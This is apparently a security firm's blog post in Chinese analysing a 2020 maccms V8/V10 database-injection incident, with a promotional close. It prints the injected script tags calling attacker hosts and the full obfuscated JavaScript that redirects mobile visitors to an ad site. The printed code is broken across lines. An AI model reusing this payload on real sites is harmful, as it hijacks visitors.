蘋果cms漏洞POC原理分析與V8 V10被掛馬解決辦法分享

蘋果CMS漏洞是愈來愈多了，國內不少電影網站都使用的是maccms V10 V8版本，就在2020年初該maccms漏洞爆發了，目前極少數的攻擊者掌握了該EXP POC，受該BUG的影響，百分之80的電影站都被攻擊了，不少電影站的站長找到咱們SINE安全來解決網站被掛馬的問題，經過分析咱們發現大部分客戶網站在數據庫中都被插入了掛馬代碼，<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>，尤爲電影片名d_name值被直接篡改，而且是批量掛馬，致使用戶打開網站訪問直接彈窗廣告並跳轉。

JS掛馬代碼以下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3

5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e

(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2"

7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script

|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent

"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon

e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(

'window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}

上面惡意代碼對訪問用戶進行了判斷，若是是手機端的，IOS，安卓，以及平板都會跳轉到攻擊者設置好的廣告網頁當中去，https://m.zhuanjiyin.net:168/index.html?u=80666就是跳轉到這裏，根據咱們SINE安全技術的分析與統計，大部分被攻擊的網站跳轉都是168端口的網址上，域名常常變換，可是168端口沒有變，能夠看出是同一個攻擊者所爲。

電影網站被掛馬的特徵就是以上這些狀況，根據客戶的反饋以及提供服務器IP，root帳號密碼後，咱們進去對蘋果cms的源代碼進行了全面的人工安全審計，在網站的根目錄下生成了webshell網站木馬後門文件，在緩存目錄中也發現了一樣的網站木馬，繼續溯源追蹤，查看nginx網站日誌，發現用的是一樣的手段，咱們SINE安全技術再熟悉不過了，經過post index.php搜索功能進行插入數據庫並嵌入掛馬代碼，漏洞產生的緣由是電影搜索裏能夠插入惡意代碼，攻擊者將惡意代碼加密後，無論你服務器用雲鎖，仍是寶塔，安全狗，都是攔截不了的，仍是會被篡改。

咱們SINE安全技術隨即對客戶的蘋果CMS漏洞進行了修復，對POST過來的數據進行了嚴格的安全過濾與檢測，對攻擊者加密的代碼也進行了特徵定位攔截。只要包含了該惡意內容，直接攔截並返回錯誤提示。對網站根目錄下存在的webshell也進行了刪除。對客戶網站的緩存目錄，以及圖片目錄，JS目錄都作了安所有署與加固，防止php腳本文件在網站的運行，對網站的管理員後臺進行了權限分離，更新採集，與網站前端訪問使用2個數據庫帳號，1個只讀權限的數據庫帳號，1個後臺採集可寫的數據庫帳號，這在安全層面上來講，網站安全等級更高了，通常攻擊者沒法攻擊與篡改。咱們即修復了漏洞，也作了安全攔截與多層次的安全加固部署，至此客戶網站數據庫被掛馬的問題得以解決。

有不少客戶的電影網站都到maccms官方進行了更新與補丁下載，但安裝後仍是會繼續被掛馬，這裏跟你們說一下，目前官方的漏洞補丁對這次數據庫掛馬漏洞是沒有任何效果的。若是不知道如何對蘋果cms漏洞進行修復以及打補丁，建議找專業的網站安全公司來處理，對index.php搜索功能這裏作安全過濾與攔截，對加密的特徵碼進行解密定位，更新到攔截黑名單中，便可修復該蘋果CMS漏洞。